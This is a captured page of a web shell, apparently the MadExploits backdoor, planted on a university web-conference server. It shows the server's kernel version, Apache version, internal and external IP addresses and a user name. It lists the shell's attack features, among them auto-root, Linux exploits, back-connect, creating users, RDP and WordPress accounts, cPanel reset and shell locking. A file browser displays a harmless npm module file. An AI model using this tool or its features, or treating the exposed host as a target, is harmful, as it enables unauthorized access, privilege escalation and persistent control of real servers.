Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.188.245.104
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
es-abstract /
[ HOME SHELL ]
Name
Size
Permission
Action
helpers
[ DIR ]
drwxr-xr-x
operations
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.editorconfig
276
B
-rw-r--r--
.jscs.json
3.91
KB
-rw-r--r--
.nycrc
234
B
-rw-r--r--
.travis.yml
6.8
KB
-rw-r--r--
GetIntrinsic.js
8.38
KB
-rw-r--r--
Makefile
3.75
KB
-rw-r--r--
es2015.js
21.28
KB
-rw-r--r--
es2016.js
454
B
-rw-r--r--
es2017.js
633
B
-rw-r--r--
es5.js
6.33
KB
-rw-r--r--
es6.js
53
B
-rw-r--r--
es7.js
53
B
-rw-r--r--
index.js
427
B
-rw-r--r--
package.json
2.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; var assign = require('./helpers/assign'); var ES5 = require('./es5'); var ES2015 = require('./es2015'); var ES2016 = require('./es2016'); var ES2017 = require('./es2017'); var ES = { ES5: ES5, ES6: ES2015, ES2015: ES2015, ES7: ES2016, ES2016: ES2016, ES2017: ES2017 }; assign(ES, ES5); delete ES.CheckObjectCoercible; // renamed in ES6 to RequireObjectCoercible assign(ES, ES2015); module.exports = ES;
Close